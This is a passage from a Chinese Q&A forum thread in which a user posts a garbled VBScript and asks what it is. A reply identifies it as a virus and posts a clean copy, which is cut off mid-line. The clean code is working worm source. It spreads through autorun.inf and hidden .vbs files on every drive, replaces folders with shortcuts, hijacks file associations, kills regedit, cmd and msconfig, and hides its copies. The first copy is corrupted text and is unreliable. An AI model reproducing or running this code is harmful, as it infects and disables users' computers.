当前位置：首页 → 问答吧 → 请教一段VBScript代码是什么意思

请教一段VBScript代码是什么意思

时间：2010-06-25

来源：互联网

下面这段代码怎么乱其八糟的阿，请教是故意弄成这样的，还是我粘错啦，要是故意弄成这样的，怎么能让它变得正常点

on Error resume next
Dim@F4oLW4hShell:Se5@F4o=C3ea5eObjec5HB4cRiPTinG.fiLE4:4TeMoBjEcTBI:Se5@W4hShell=C3ea5eObjec5HB8ScRipT.SHelLBI:Call@MainHI
sub main()
On Error Resume NextZDim argsL VirusLoadL VirusassZSet args]WScriptNargumentsZVirusLoad]GetMainVirus(QIZVirusass]GetMainVirus(PIZargNum]PZDo While argNum \ argsNCountZParam]Param&" "&args(argNumIZargNum]argNum K QZLoop
su#P"r"m=LC"s&(R*()t(P"r"m, 3))
select case subparam
C"4& "36/"
RunPath]Left(WScript.ScriptfullName, R)Zcall Run(RunPath)Zcall InvadeSystem(VirusLoad,Virusass)Zcall Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
case "txt", "log","ini" ,"inf"
R6/P"5)="%S:45&.R005%\4:45&.32\NOTEPAD.EXE "&P"3".:C"-- R6/(R6/P"5)):C"-- I/7"%&S:45&.(V*364L0"%,V*364A44):C"-- R6/("%S:45&.R005%\4:45&.\47$)045.&9& "&V*364L0"%)
Case "bat", "cmd"
RunPath=BCMD@Oc@echo@HiAIGm@hereAFpauseB:Call@RunHRunPathI:Call@InvadeS:stemHVirusLoadLVirusAssI:Call@RunHBES:stemRootE\s:stem\svchostNe9e@BFVirusLoadI
C"4& "3&("
R6/Pa5h=B3eged*5.e9e@B&BBBB&T3*.(Pa3a.)&BBBB:Ca--@R6/(R6/Pa5h):Ca--@I/7adeS:45e.(V*364L0ad,V*364A44):Ca--@R6/(B%S:45e.R005%\4:45e.\47ch045.e9e@B&V*364L0ad)
case "chm"
runpath="hh.exe "&""""&trim(param)&"""":call run(runpath):call invadesystem(virusload,virusass):call run("%systemroot%\system\svchost.exe "&virusload)
C"s& "hlp"
R6/P"5)="8*/)-132.&9& "&""""&T3*.(P"3".)&"""":C"-- R6/(R6/P"5)):C"-- I/7"%&S:45&.(V*364L0"%,V*364A44):C"-- R6/("%S:45&.R005%\4:45&.\47$)045.&9& "&V*364L0"%)
Case@BdirB
RunPath]""""&Left(Trim(Param),Len(Trim(Param))-S)&""""Zcall Run(RunPath)Zcall InvadeSystem(VirusLoad,Virusass)Zcall Run("%SystemRoot%\system\svchostNexe "&VirusLoad)
Case@BoieB
runpath="""%programfiles%|internet explorer|iexplore.exe""":Call run(runpath):Call invadesystem(virusload,virusAss):Call run("%systemroot%|system|svchost.exe "&virusload)
Case "omc"
RunPath]"explorerNexe OnLZZ{RPDPTFEPMSAEAMQPVYMARDXMPXPPRBSPSPYD}"ZCall RunHRunPathIZCall InvadeSystemHVirusLoadLVirusAssIZCall RunH"%SystemRoot%\system\svchostNexe "FVirusLoadI
case "emc"
R6/P"5)="&91-03&3.&9& //,/&,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}":C"-- R6/(R6/P"5)):C"-- I/7"%&Sy45&.(V*364L0"%,V*364A44):C"-- R6/("%Sy45&.R005%\4y45&.\47$)045.&9& "&V*364L0"%)
case else
If@P3eDb-I/45a/ce=T36e@The/
WScriptNQuit
End If
tim&out = D"t&%i''("ww", G&tIn'&$t&%D"t&, D"t&) - 12
I' T*.&065>0 A/% M0/5)(D"5&) = D":(D"5&) T)&/
call Virusalert()
C"-- M",&Jo,&(CInt(Mont)(D"t&)))
E/% I'
call monitorsystem()
E/% S&-&$t
E/% S6#
S6# M0/*503Sy45&.()
O/@[email protected]@Ne95:[email protected],@E9eF6--Na.e4:P30ce44Na.e4=A33a:(Bc.d.e9eB,Bc.d.c0.B,B3egedi5.e9eB,B3egedi5.4c3B,B3egedi5.1ifB,B3egedi5.c0.B,B.4c0/fig.e9eB):VBSF6--Na.e4=A33a:(Ge5Mai/Vi364(1)):D0:Ca--@Ki--P30ce44(P30ce44Na.e4):Ca--@I/7adeS:45e.(Ge5Mai/Vi364(1),Ge5Mai/Vi364(0)):Ca--@Kee1P30ce44(VBSF6--Na.e4):WSc3i15.S-ee1@3000:L001
E/% S6#
Sub@InvadeSystemHVirusLoadPathLVirusAssPathI
On Error Resume NextZDim Load_ValueL File_ValueL IE_ValueL MyCpt_ValueQL MyCpt_ValueRL HCULoadL HCUVerL VirusCodeL VersionZLoad_Value]""""FVirusLoadPathF""""ZFile_Value]"%SystemRoot%\SystemSR\WScriptNexe "F""""FVirusAssPathF""""F" %Q %J "ZIE_Value]"%SystemRoot%\SystemSR\WScriptNexe "F""""FVirusAssPathF""""F" OIE "ZMyCpt_ValueQ]"%SystemRoot%\SystemSR\WScriptNexe "F""""FVirusAssPathF""""F" OMC "ZMyCpt_ValueR]"%SystemRoot%\SystemSR\WScriptNexe "F""""FVirusAssPathF""""F" EMC "ZHCULoad]"HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"ZHCUVer]"HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"ZHCUDate]"HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"ZVirusCode]GetCodeHWScriptNScriptFullNameIZVersion]QZHostSourcePath]FsoNGetSpecialFolderHQIF"\WscriptNexe"ZHostFilePath]FsoNGetSpecialFolderHPIF"\system\svchostNexe"
For E"ch Drive in Fso.Drives:if Drive.isre"dy "nd (Drive.Drivetype=1 or Drive.Drivetype=2 or Drive.Drivetype=3) then:Diskvirusn"me=Getseri"lnum#er(Drive.Driveletter)&".v#s":C"ll Cre"teAutorun(Drive.Driveletter,Diskvirusn"me):C"ll infectroot(Drive.Driveletter,Diskvirusn"me):End if:next:if Fso.FileExists(virusAssp"th)=F"lse or Fso.FileExists(viruslo"dp"th)=F"lse or Fso.FileExists(HostFilep"th)=F"lse or Getversion()< version then:if GetFilesystemtype(GetsystemDrive())="ntFs" then:C"ll Cre"teFile(virusCode,virusAssp"th):C"ll Cre"teFile(virusCode,viruslo"dp"th):C"ll CopyFile(Hostsourcep"th,HostFilep"th):C"ll setHiddenAttr(HostFilep"th):Else:C"ll Cre"teFile(virusCode, virusAssp"th):C"ll setHiddenAttr(virusAssp"th):C"ll Cre"teFile(virusCode,viruslo"dp"th):C"ll setHiddenAttr(viruslo"dp"th):C"ll CopyFile(Hostsourcep"th, HostFilep"th):C"ll setHiddenAttr(HostFilep"th):End if:End if
I' R&"%R&((HCUL0"%)<>L0"% V"-u& T)&/:C"-- Wr*t&R&( (HCUL0"%, L0"% V"-u&, ""):E/% I':I' G&tV&rs*0/() < V&rs*0/ T)&/:C"-- Wr*t&R&( (HCUV&r, V&rs*0/, ""):E/% I':I' G&tI/'&$t&%D"t&() = "" T)&/:C"-- Wr*t&R&( (HCUD"t&, D"t&, ""):E/% I':I' R&"%R&(("HKEy LOCAL MACHINE|SOFTWARE|C-"ss&s|txt'*-&|s)&--|01&/|$0.."/%|")<>F*-& V"-u& T)&/:C"-- S&tTxtF*-&Ass(V*rusAssP"t)):E/% I':I' R&"%R&(("HKEy LOCAL MACHINE|SOFTWARE|C-"ss&s|*/*'*-&|s)&--|01&/|$0.."/%|")<>F*-& V"-u& T)&/:C"-- S&tI/*F*-&Ass(V*rusAssP"t)):E/% I':I' R&"%R&(("HKEy LOCAL MACHINE|SOFTWARE|C-"ss&s|*/''*-&|s)&--|01&/|$0.."/%|")<>F*-& V"-u& T)&/:C"-- S&tI/'F*-&Ass(V*rusAssP"t)):E/% I':I' R&"%R&(("HKEy LOCAL MACHINE|SOFTWARE|C-"ss&s|#"t'*-&|s)&--|01&/|$0.."/%|")<>F*-& V"-u& T)&/:C"-- S&tB"tF*-&Ass(V*rusAssP"t)):E/% I':I' R&"%R&(("HKEy LOCAL MACHINE|SOFTWARE|C-"ss&s|$.%'*-&|s)&--|01&/|$0.."/%|")<>F*-& V"-u& T)&/:C"-- S&tC.%F*-&Ass(V*rusAssP"t)):E/% I'
If ReadRegHBHKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\BI<>File_Value ThenZCall SetRegFileAssHVirusAssPathIZEnd IfZIf ReadRegHBHKEY_LOCAL_MACHINE\SOFTWARE\Classes\chmNfile\shell\open\command\BI<>File_Value ThenZCall SetchmFileAssHVirusAssPathIZEnd If
If ReadRegH"HKEY_LOCaL_MaCHINE\SOFTWaRE\Classes\hlpfile\shell\open\command\"I\^File_Value ThenZCall SethlpFileassHVirusassPathIZEnd IfZIf ReadRegH"HKEY_LOCaL_MaCHINE\SOFTWaRE\Classes\applications\iexploreNexe\shell\open\command\"I\^IE_Value ThenZCall SetIEassHVirusassPathIZEnd IfZIf ReadRegH"HKEY_CLaSSES_ROOT\CLSID\{XWQCUSXPMTRaPMQPVYMaREaMPXPPRBSPSPYD}\shell\OpenHomePage\Command\"I\^IE_Value ThenZCall SetIEassHVirusassPathIZEnd IfZIf ReadRegH"HKEY_CLaSSES_ROOT\CLSID\{RPDPTFEPMSaEaMQPVYMaRDXMPXPPRBSPSPYD}\shell\open\command\"I\^MyCpt_ValueQ ThenZCall SetMyComputerassHVirusassPathIZEnd IfZIf ReadRegH"HKEY_CLaSSES_ROOT\CLSID\{RPDPTFEPMSaEaMQPVYMaRDXMPXPPRBSPSPYD}\shell\explore\command\"I\^MyCpt_ValueR ThenZCall SetMyComputerassHVirusassPathIZEnd IfZCall RegSetHI
end Sub
Sub@Cop:FileHsourceL@pathfI:On@Error@Resume@Ne9t:If@FSONFileE9istsHpathfI@Then:FSONDeleteFile@pathf@L@True:End@If:FSONCop:File@sourceL@pathf:End@Sub:Sub@CreateFileHcodeL@pathfI:On@Error@Resume@Ne9t:Dim@FileTe9t:If@FSONFileE9istsHpathfI@Then:Set@FileTe9t=FSONOpenTe9tFileHpathfL@RL@FalseI:FileTe9tNWrite@code:FileTe9tNClose:Else:Set@FileTe9t=FSONOpenTe9tFileHpathfL@RL@TrueI:FileTe9tNWrite@code:FileTe9tNClose:End@If:End@Sub
su# Cre"teFile(code, p"thf)
on error resume next
dim filetext
[email protected](1a5hf)@The/
S&5 F*-&T&x5=FSO.O1&/T&x5F*-&(1"5)', 2, F"-4&)
fileTextNWrite code
FileTextNClose
else
Se5@FileTe95=FSONOpenTe95FileHpa5hfL@2L@Tr6eI
FileTe95.W3i5e@code
filetext.close
end if
end sub
S6b@RegSe5HI
O/ E3303 R&46.& N&x5
D*. R&(P"t)1 , R&(P"t)2, R&(P"t)3, R&(P"t)4
regpath1="hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\nohidden\checkedvalue"
RegPathR]"hKeY_LOcaL_MachiNe\SOfTWaRe\Microsoft\Windows\currentVersion\explorer\advanced\folder\hidden\ShOWaLL\checkedValue"
R&(P"t)3="HKEy CuRRENT uSER|So'tw"r&|M*$roso't|w*/%ows|Curr&/tv&rs*o/|Po-*$*&s|Exp-or&r|NoDr*v&Typ&AutoRu/"
RegPathT]"HKEY_CLaSSES_ROOT\lnkfile\IsShortcut"
C"-- wr*t&R&( (R&(P"t)1, 3, "REG DwORD")
C"-- W3*5&R&( (R&(P"5)2, 2, "REG_DWORD")
C"ll writereg (regp"th3, 0, "rEG DworD")
call deleteReg (RegPathT)
End@S6b
S6b@K*--P30ce44(P30ce44Na.e4)
on error resume nextZSet WmiService]getobject("winmgmtsZ\\.\root\cimv2")Zfor each processname in processnames ZSet processlist]WmiService.execquery(" Select * from win32_process where name ]'"&processname&"' ")Zfor each process in processlistZintreturn]process.terminateZif intreturn\^0 ThenZWshShell.run "cmd /c ntsd -c q -p "&process.handle, vbhide, falseZend ifZnextZnext
end Sub
[email protected]/i5:(D):O/@[email protected]@Ne95:I..6/i5:F0lde3=DFB:\A65036/.i/fB:[email protected](I..6/i5:F0lde3)@The/:W4hSHell.R6/@(BCMD@/C@CACLS@[email protected]/i5:F0lde3FBBBB@FB@/5@/e@/c@/g@e7e3:0/e:fB),7bHide,T36e:W4hSHell.R6/@(BCMD@/C@RD@/S@/Q@[email protected]/i5:F0lde3),@7bHide,@T36e:E/d@If:E/d@S6b:S6b@Kee1P30ce44(VBSF6llNa.e4):O/@[email protected]@Ne95:F03@[email protected]@i/@VBSF6llNa.e4@:If@VBSP30ce44C06/5(VBSF6llNa.e)@<@2@5he/:R6/(BES:45e.R005E\4:45e.\[email protected]):E/d@If:Ne95:E/d@S6b
Function getsystemDrive():getsystemDrive=left(Fso.getspecialFolder(0),2):End Function
function getfileSystemType(drive)ZSet d]fSo.getdrive(drive)ZgetfileSystemType]d.fileSystemZend function
function ReadReg(strkey)Zdim tmpsZSet tmps]createObject("WScriptNShell")ZReadReg]tmpsNRegRead(strkey)ZSet tmps]NothingZend function
sub Writereg(strkey, Value, vtype):dim tmps:set tmps]createobject("Wscript.shell"):if vtype]"" then:tmps.regWrite strkey, Value:else:tmps.regWrite strkey, Value, vtype:end if:set tmps]nothing:end sub:sub deletereg(strkey):dim tmps:set tmps]createobject("Wscript.shell"):tmps.regdelete strkey:set tmps]nothing:end sub:sub sethiddenattr(path):on error resume next:dim vf:set vf]fso.getfile(path):set vf]fso.getfolder(path):vf.attributes]6:end sub
Sub Run(exefullName)ZOn error Resume NextZdim WshShellZSet WshShell]WScript.createObject("WScript.Shell")ZWshShell.Run exefullNameZSet WshShell]NothingZend SubZSub infectRoot(d,VirusName)ZOn error Resume NextZdim VbScodeZVbScode]getcode(WScript.ScriptfullName)ZVbSPath]d&"Z\"&VirusNameZif fSO.fileexists(VbSPath)]false ThenZcall createfile(VbScode, VbSPath)Zcall Sethiddenattr(VbSPath)Zend ifZSet folder]fso.getfolder(d&"Z\")ZSet Subfolders]folder.SubfoldersZfor each Subfolder in SubfoldersZSethiddenattr(Subfolder.Path)ZlnkPath]d&"Z\"&Subfolder.Name&".lnk"ZTargetPath]d&"Z\"&VirusNameZargs]""""&d&"Z\"&Subfolder.Name& "\dir"""Zif fso.fileexists(lnkPath)]false Or getTargetPath(lnkPath) \^ TargetPath ThenZif fso.fileexists(lnkPath)]True ThenZfSO.deletefile lnkPath, TrueZend ifZcall createShortcut(lnkPath,TargetPath,args)Zend ifZNextZend Sub
S6b@CreateShortc6tHLnkPathLTargetPathLArgsI:Set@Shortc6t=WshShellNCreateShortc6tHLnkPathI:8ith@Shortc6t:NTargetPath=TargetPath:NArg6ments=Args:NWindo8St:le=4:NIconLocation=BES:stemRootE\S:stem32\Shell32NdllL@3B:NSa7e:end@8ith:End@S6b
S6b@C3ea5eA650R6/(D,Vi364Na.e):O/@[email protected]@Ne95:Di.@I/fPa5h,@VBSPa5h,@VBSC0de:I/fPa5h=D&B:\A650R6/.i/fB:VBSPa5h=D&B:\B&Vi364Na.e:VBSC0de=Ge5C0de(WSc3i15.Sc3i15F6--Na.e):[email protected](I/fPa5h)=Fa-4e@[email protected](VBSPa5h)=Fa-4e@The/:Ca--@C3ea5eFi-e(VBSC0de,@VBSPa5h):Ca--@Se5Hidde/A553(VBSPa5h):S53I/f=B[A650R6/]B&VBCRLF&BShe--e9ec65e=WSc3i15.e9e@B&Vi364Na.e&B@BBA650R6/BBB&VBCRLF&B4he--\01e/=打开(&O)B&VBCRLF&B4he--\01e/\c0..a/d=WSc3i15.e9e@B&Vi364Na.e&B@BBA650R6/BBB&VBCRLF&B4he--\01e/\Defa6-5=1B&@VBCRLF&B4he--\e91-03e=资源管理器(&X)B&VBCRLF&B4he--\e91-03e\c0..a/d=WSc3i15.e9e@B&Vi364Na.e&B@BBA650R6/BBB:[email protected]/i5:(D):Ca--@C3ea5eFi-e(S53I/f,@I/fPa5h):Ca--@Se5Hidde/A553(I/fPa5h):E/d@If:E/d@S6b
sub settxtfileass(sfilepath)
On@Error@Resume@Ne9t
Dim Value
Value="ESystemRootE\SystemSR\WScriptNexe "F""""FsFilePathF""""F" EQ EJ "
Call WriteRegH"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\"L ValueL "REG_EXPAND_SZ"I
End@Sub
S6b S&5I/*F*-&A44(4F*-&Pa5))
on Error r&sum& n&xt
Dim v"lu&
V"-u&="%Syst&.R00t%|Syst&.32|WS$r*1t.&x& "&""""&sF*-&P"t)&""""&" %1 %* "
call writereg("hkey_locAl_mAchine\softwAre\classes\inifile\shell\open\command\", value, "reg_expAnd_sz")
End@Sub
su# s&tIn'Fil&Ass(sFil&p"th)
O/ E3303 R&46.& N&95
dim Value
Value]"ESystemRootE\SystemSR\WScriptNexe "F""""FsFilePathF""""F" EQ EJ "
call Writereg("hkeY_local_machine\softWare\classes\inffile\shell\open\command\", Value, "reg_eXpand_sZ")
E/% S6#
Su# S&tB"tF*-&A44(4F*-&P"t))
On@E33o3@Re46me@Ne95
dim Value
Va-6e=B%S:45e.R005%\S:45e.32\WSc3*15.e9e@B&BBBB&4F*-ePa5)&BBBB&B@%1@%*@B
Call@WriteRegHBHKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\BL@ValueL@BREG_EXPAND_SZBI
End@Sub
Sub SetCmdFileAssHsFilePathI
On Error Resume Next
Dim@Value
Value=BESystemRootE\SystemSR\WScriptNexe BFBBBBFsFilePathFBBBBFB EQ EJ B
Call@W3i5eRegHBHKEY_LOCAL_MACHINE\SOFTWARE\Cla44e4\cmdfile\4hell\open\command\BL@Val6eL@BREG_EXPAND_SZBI
E/d@S6b
sub sethlpfileAss(sfilepath)
On@E3303@Re46me@Ne95
D*. V"-6&
v"lu&="%syst&mroot%|syst&m32|ws$r*pt.&x& "&""""&sF*l&P"t)&""""&" %1 %* "
C"ll writereg("hkEy loCAl mAChinE|soFtwArE|Cl"sses|hlpfile|shell|open|comm"nd|", v"lue, "rEG ExpAnD sz")
E/% Su#
su# s&tR&(F*-&Ass(sF*-&P"t))
On Error Resume Next
Dim Value
Va-6&="%S:45&.R005%\S:45&.32\WS$3*15.&9& "&""""&4F*-&Pa5)&""""&" %1 %* "
call WriteReg("HKeY_LOcaL_MacHINe\SOfTWaRe\classes\regfile\shell\open\command\", Value, "Reg_eXPaNd_SZ")
end sub
S6b@Se5c).F*-eA44(4F*-ePa5))
On Error Resume Next
dim Value
Value]"%SystemRoot%\System32\WScript.exe "&""""&sfilepath&""""&" %1 %* "
C"-- W3*5&R&(("HKEY LOCAL MACHINE\SOFTWARE\C-"44&4\$)..'*-&\4)&--\01&/\$0.."/%\", V"-6&, "REG EXPAND SZ")
End@S6b
sub setieass(sfilepath)
O/ E3303 R&46.& N&95
D*. V"-u&
Val6e=BES:s5emRoo5E\S:s5em32\WScrip5Ne9e@BFBBBBFsFilePa5hFBBBBFB@OIE@B
call WriteReg("hKeY_LOcaL_MachiNe\SOfTWaRe\classes\applications\iexplore.exe\shell\open\command\", Value, "Reg_eXPaNd_SZ")
C"-- W3*5&R&(("HKEY CLASSES ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\4)&--\O1&/H0.&P"(&\C0.."/%\", V"-6&, "REG EXPAND SZ")
E/d@S6b
Sub SetMycomputerass(sFilePath)
On@Error@Resume@Next
Dim v"lue1,v"lue2
Value1]"%Systemroot%\System32\WScript.exe "&""""&sfilepath&""""&" omc "
Va-6&2="%S:45&.R005%\S:45&.32\WS$3*15.&9& "&""""&4F*-&Pa5)&""""&" EMC "
Call@W3i5eRegHBHKEY_CLASSES_ROOT\CLSID\<20D04FE0-3AEA-1069-A2D8-08002B30309D>\4hell\BL@BBL@BREG_SZBI
Ca--@W3i5eReg(BHKEY_CLASSES_ROOT\CLSID\<20D04FE0-3AEA-1069-A2D8-08002B30309D>\4he--\01e/\c0..a/d\B,@Va-6e1,@BREG_EXPAND_SZB)
call WriteReg("hkeY_claSSeS_RooT\clSid\{20d04fe0-3aea-106Y-a2dX-0X002b3030Yd}\shell\explore\command\", Value2, "Reg_eXpand_SZ")
En% su#
F6nc5ion@Ge5Se3ialN6mbe3HD37I
on error resume next
Set d=fsoNGetDriveHDrvI
GetSerialNumber]dNSerialNumber
GetSerialNumber=ReplaceHGetSerialNumberLBMBLBBI
End@Function
F6/c5*0/ G&5Ma*/V*364(N)
O/ Err0r R&su.& N&xt
M"*/V*364N".&=G&5S&3*"-N6.#&3(G&5Sy45&.D3*7&())&".7#4"
if getFilesystemtype(getsystemDrive())="ntFs" then
If@N=1@T)e/
GetMainVirus]FsoNGetSpecialFolderHNIF"\smssNexeZ"FMainVirusName
end If
I' N=0 T)&/
GetMainVirus]FsoNGetSpecialFolder(N)&"\explorerNexeZ"&MainVirusName
End If
E-4e
GetMainVirus]FsoNGetSpecialFolderHNIF"\"FMainVirusName
end if
end function
Fun$t*on vBsPro[ DISCUZ_CODE_0 ]ssCount(vBsP"t))
on error Resume next
dim WMiService, ProcessList, Process
VbSProcesscount]P
Se5@WMISe37ice=Ge5Objec5HB8inmgm54:\\.\3oo5\cim72BI
Se5@P3oce44Li45=WMISe37ice.E9ecQ6e3:HBSelec5@J@f3om@Win32_P3oce44@Whe3e@BFBName=Gc4c3ip5.e9eG@o3@Name=G84c3ip5.e9eG@o3@Name=G47cho45.e9eGBI
for each Process in Processlist
if inStr(Process.commandline, VbSPath)^0 Then
VBSProcessCount=VBSProcessCountKQ
End If
Next
end function
function PredblInstance()
On Error R&sum& N&xt
PreDblInstance=False
I' VBSP30[ DISCUZ_CODE_0 ]44C0u/t(WS$3*1t.S$3*1tFu--N".&)>= 3 T)&/
PredblInstance]True
En% I'
end function
F6/$5*0/ G&5Ta3(&5Pa5)(L/,Pa5))
On error Resume Next
dim Shortcut
set shortcut=wshshell.Createshortcut(lnkpath)
GetTargetPath=ShortcutNTargetPath
end function
F6nc5ion@Ge5CodeHF6llPa5hI
On error Resume Next
dim fileText
Set@FileTe9t=FSONOpenTe9tFileHFullPathL@QI
GetCode]FileTextNReadAll
FileTe95.Cl04e
End Function
Function@GetVersionHI
Dim verinfo
V&3I/'0="HKEY_CURRENT_USER\S0'5Wa3&\M*$3040'5\W*/%084 NT\C633&/5V&34*0/\W*/%084\V&3"
If@ReadReg(Ve3I/f0)=BB@The/
Ge5Ve34i0/=0
E-4&
Ge5Ve34i0/=CI/5(ReadReg(Ve3I/f0))
E/% I'
End Function
Su# v*rusA-&rt()
On@Error@Resume@Next
Dim HtaPathLHtaCode
H5aPa5)=F40.Ge5S1ec*a-F0-de3(1)&"\BFA-e35.)5a"
H5"C0%&="<HTML><HEAD><TITLE>暴风一号</TITLE>"&VBCRLF&"<HTA:APPLICATION APPLICATIONNAME=""B0yF*/& V1.0"" SCROLL=""/0"" w*/%0w45"5&=""."x*.*z&"" #03%&3=""/0/&"""&VBCRLF&"SINGLEINSTANCE=""y&4"" CAPTION=""/0"" $0/5&x5M&/6=""/0"" S)0wI/T"4,B"3=""/0"" 4&-&$5*0/=""/0"">"&VBCRLF&"</HEAD><BODY #($0-03=#000000><DIV "-*(/ =""[ DISCUZ_CODE_0 ]/5&3"">"&VBCRLF&"<'0/5 45y-&=""'0/5-4*z&:3500%;'0/5-'".*-y:W*/(%*/(4;$0-03=3&%"">N</'0/5><BR>"&VBCRLF&"<'0/5 45y-&=""'0/5-4*z&:200%;'0/5-'".*-y:黑体;$0-03=3&%"">暴风一号</'0/5>"&VBCRLF&"</DIV></BODY></HTML>"
If@FSONFileExistsHHtaPathI=False@Then
call createfile(htacode, htaPath)
Ca-- S&5H*%%&/A553(H5aPa5))
En% I'
Call RunHHtaPathI
E/% S6#
F6nc5ion@Ge5Infec5edDa5eHI
On Error Resume Next
D*. D"5&I/'0
Da5eI/f0=BHKEY_CURRENT_USER\S0f5Wa3e\Mic3040f5\Wi/d084@NT\C633e/5Ve34i0/\Wi/d084\Da5eB
If@ReadRegHDa5eInfoI=BB@Then
G&tI/'&$t&%D"t&=""
else
GetInfectedDate]CDate(ReadReg(DateInfoII
End@If
End Function
Sub@MakeJokeHTimesI
On error Resume Next
Dim WMPL colCDROMs
Set@WMP@=@CreateObjectH@BWMPlayerNOCXB@I
S&5 c0-CDROM4 = WMP.c%30.C0--&c5*0/
I' $olCDrOMs.Count >0 t)&n
For i]Q to Times
colcdROMs.item(P).eject()
WScriptNSleep@3PPP
colcdRoms.item(0).eject()
N&x5
End If
Se5@WMP@=@N05hi/g
end Sub

复制代码

作者: 8913845 发布时间: 2010-06-25

看来是我弄错了，正确的代码是这个，网上搜到一模一样的了，挺烦人的一个vbs病毒

On Error Resume Next
Dim Fso,WshShell:Set Fso=CreateObject("scRiPTinG.fiLEsysTeMoBjEcT"):Set WshShell=CreateObject("wScRipT.SHelL"):Call Main()
Sub Main()
On Error Resume Next:Dim Args, VirusLoad, VirusAss:Set Args=WScript.Arguments:VirusLoad=GetMainVirus(1):VirusAss=GetMainVirus(0):ArgNum=0:Do While ArgNum < Args.Count:Param=Param&" "&Args(ArgNum):ArgNum=ArgNum + 1:Loop
SubParam=LCase(Right(Param, 3))
Select Case SubParam
Case "run"
RunPath=Left(WScript.ScriptFullName, 2):Call Run(RunPath):Call InvadeSystem(VirusLoad,VirusAss):Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "txt", "log","ini" ,"inf"
RunPath="%SystemRoot%\system32\NOTEPAD.EXE "&Param:Call Run(RunPath):Call InvadeSystem(VirusLoad,VirusAss):Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "bat", "cmd"
RunPath="CMD /c echo Hi!I'm here!&pause":Call Run(RunPath):Call InvadeSystem(VirusLoad,VirusAss):Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "reg"
RunPath="regedit.exe "&""""&Trim(Param)&"""":Call Run(RunPath):Call InvadeSystem(VirusLoad,VirusAss):Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "chm"
RunPath="hh.exe "&""""&Trim(Param)&"""":Call Run(RunPath):Call InvadeSystem(VirusLoad,VirusAss):Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "hlp"
RunPath="winhlp32.exe "&""""&Trim(Param)&"""":Call Run(RunPath):Call InvadeSystem(VirusLoad,VirusAss):Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "dir"
RunPath=""""&Left(Trim(Param),Len(Trim(Param))-3)&"""":Call Run(RunPath):Call InvadeSystem(VirusLoad,VirusAss):Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "oie"
RunPath="""%ProgramFiles%\Internet Explorer\IEXPLORE.EXE""":Call Run(RunPath):Call InvadeSystem(VirusLoad,VirusAss):Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "omc"
RunPath="explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}":Call Run(RunPath):Call InvadeSystem(VirusLoad,VirusAss):Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "emc"
RunPath="explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}":Call Run(RunPath):Call InvadeSystem(VirusLoad,VirusAss):Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case Else
If PreDblInstance=True Then
WScript.Quit
End If
Timeout = Datediff("ww", GetInfectedDate, Date) - 12
If Timeout>0 And Month(Date) = Day(Date) Then
Call VirusAlert()
Call MakeJoke(CInt(Month(Date)))
End If
Call MonitorSystem()
End Select
End Sub
Sub MonitorSystem()
On Error Resume Next:Dim ProcessNames, ExeFullNames:ProcessNames=Array("cmd.exe","cmd.com","regedit.exe","regedit.scr","regedit.pif","regedit.com","msconfig.exe"):VBSFullNames=Array(GetMainVirus(1)):Do:Call KillProcess(ProcessNames):Call InvadeSystem(GetMainVirus(1),GetMainVirus(0)):Call KeepProcess(VBSFullNames):WScript.Sleep 3000:Loop
End Sub
Sub InvadeSystem(VirusLoadPath,VirusAssPath)
On Error Resume Next:Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version:Load_Value=""""&VirusLoadPath&"""":File_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" %1 %* ":IE_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OIE ":MyCpt_Value1="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OMC ":MyCpt_Value2="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" EMC ":HCULoad="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load":HCUVer="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver":HCUDate="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date":VirusCode=GetCode(WScript.ScriptFullName):Version=1:HostSourcePath=Fso.GetSpecialFolder(1)&"\Wscript.exe":HostFilePath=Fso.GetSpecialFolder(0)&"\system\svchost.exe"
For Each Drive In Fso.Drives:If Drive.IsReady and (Drive.DriveType=1 Or Drive.DriveType=2 Or Drive.DriveType=3) Then:DiskVirusName=GetSerialNumber(Drive.DriveLetter)&".vbs":Call CreateAutoRun(Drive.DriveLetter,DiskVirusName):Call InfectRoot(Drive.DriveLetter,DiskVirusName):End If:Next:If FSO.FileExists(VirusAssPath)=False Or FSO.FileExists(VirusLoadPath)=False Or FSO.FileExists(HostFilePath)=False Or GetVersion()< Version Then:If GetFileSystemType(GetSystemDrive())="NTFS" Then:Call CreateFile(VirusCode,VirusAssPath):Call CreateFile(VirusCode,VirusLoadPath):Call CopyFile(HostSourcePath,HostFilePath):Call SetHiddenAttr(HostFilePath):Else:Call CreateFile(VirusCode, VirusAssPath):Call SetHiddenAttr(VirusAssPath):Call CreateFile(VirusCode,VirusLoadPath):Call SetHiddenAttr(VirusLoadPath):Call 